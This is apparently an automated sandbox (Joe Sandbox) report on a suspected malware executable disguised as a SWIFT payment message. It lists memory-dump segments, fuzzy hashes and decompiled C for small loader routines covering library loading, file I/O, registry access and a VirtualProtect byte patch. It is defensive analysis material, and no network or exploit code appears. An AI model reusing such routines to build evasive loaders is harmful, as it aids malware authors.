Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
Opcode Fuzzy Hash: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040665C(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065EC(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406664
0x00406667
0x0040666e
0x00406676
0x00406682
0x00000000
0x00406689
0x00406679
0x00406680
0x00000000
0x00406691
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
GetProcAddress.KERNEL32(00000000,?), ref: 00406689

Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D74(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d78
0x00405d85
0x00405d9a
0x00405da0

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4F Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4F(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d54
0x00405d5a
0x00405d5f
0x00405d68
0x00405d68
0x00405d71

APIs

GetFileAttributesW.KERNELBASE(?,?,00405954,?,?,00000000,00405B2A,?,?,?,?), ref: 00405D54
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D68

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 17c45ac7ebe851d6f29742f799baae9df596671d30cdc88244d2177400b79203
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: C6D01276505420AFC2512738EF0C89FBF95DB54371B068B35FAE9A22F0CB304C578A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405832(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405838
0x00405840
0x00000000
0x00405846
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061E2(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004061C9();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027e9
0x004027e9
0x004027ea
0x004027f2
0x004027f7
0x004027f8
0x00402807
0x00402810
0x00402a61
0x00402a62
0x00402a65
0x00402a65
0x00402810
0x00402ac2
0x00402ace

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807

Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402306
0x00402306
0x00402308
0x0040230c
0x0040230f
0x00402314
0x00402319
0x00402322
0x00402322
0x00402327
0x00402330
0x00402330
0x0040233d
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D

Uniqueness

Uniqueness Score: -1.00%

Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040611D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406074(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406127
0x00406130
0x00406146
0x00000000
0x00406146
0x00406134
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679

Uniqueness

Uniqueness Score: -1.00%

Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E26(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e2a
0x00405e3a
0x00405e42
0x00000000
0x00405e49
0x00000000
0x00405e4b

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DF7(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dfb
0x00405e0b
0x00405e13
0x00000000
0x00405e1a
0x00000000
0x00405e1c

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8

Uniqueness

Uniqueness Score: -1.00%

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027cb
0x100027d0
0x100027e0
0x100027e8
0x100027ef
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x1000280d
0x10002815

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Uniqueness

Uniqueness Score: -1.00%

Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060EF(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406074(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060f9
0x00406100
0x00406113
0x00000000
0x00406113
0x00406104
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
